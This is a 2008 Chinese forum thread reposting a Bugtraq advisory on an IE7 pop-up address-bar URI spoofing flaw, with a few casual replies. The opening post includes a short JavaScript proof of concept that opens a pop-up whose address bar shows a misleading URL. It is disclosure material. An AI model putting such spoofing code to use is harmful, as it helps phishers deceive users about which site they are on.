IE7弹出窗口地址栏URI欺骗漏洞_派派后花园

用户中心 游戏论坛 社区服务
发帖 回复
阅读:1258 回复:3

IE7弹出窗口地址栏URI欺骗漏洞

刷新数据 楼层直达
罖罖罖

ZxID:1237416


等级: 热心会员
|▌秂到死莳財綄渼、
举报 只看楼主 使用道具 楼主   发表于: 2008-04-10 0
描述:

  BUGTRAQ ID: 28498

  Internet Explorer是微软发布的非常流行的WEB浏览器。

  如果用户用IE访问了恶意网页的话,则弹出窗口的地址栏可能为任意地址而窗口主题中为任意页面或内容。这有助于攻击者执行网络钓鱼攻击。

  <*来源:Juan Pablo Lopez Yacubian ([email protected])

  链接:http://marc.info/?l=bugtraq&m=120673515616258&w=2

  *>

  测试方法:

  警 告

  以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

<script language="JavaScript">
function iniciar()
{

nuevaventana = window.open("", "Win", "width=500,height=500,location=1");

nuevaventana.document.location = "http://www.google.com.ar/#" +  "www.microsoft.com/";

}
iniciar()
</script>



  建议:

  目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

  http://www.microsoft.com/windows/ie/default.asp
還以僞迩会陪峩地耂兲荒
傆來偝景電影結侷兜﹃樣
奋、  ˉ斗

ZxID:1306520

等级: 明星作家
没有最好的..!      .
举报 只看该作者 沙发   发表于: 2008-04-10 0
不用IE。。。。。。。。。。。。。。。。。用  遨游      嬉戏~~~还是谢谢 LZ
独々存

ZxID:1270856


等级: 内阁元老
举报 只看该作者 板凳   发表于: 2008-04-10 0
我用IE,但不懂LZ说的什么~~~
lkm_h

ZxID:1229042

等级: 略知一二
举报 只看该作者 地板   发表于: 2008-04-11 0
楼上真幽默
发帖 回复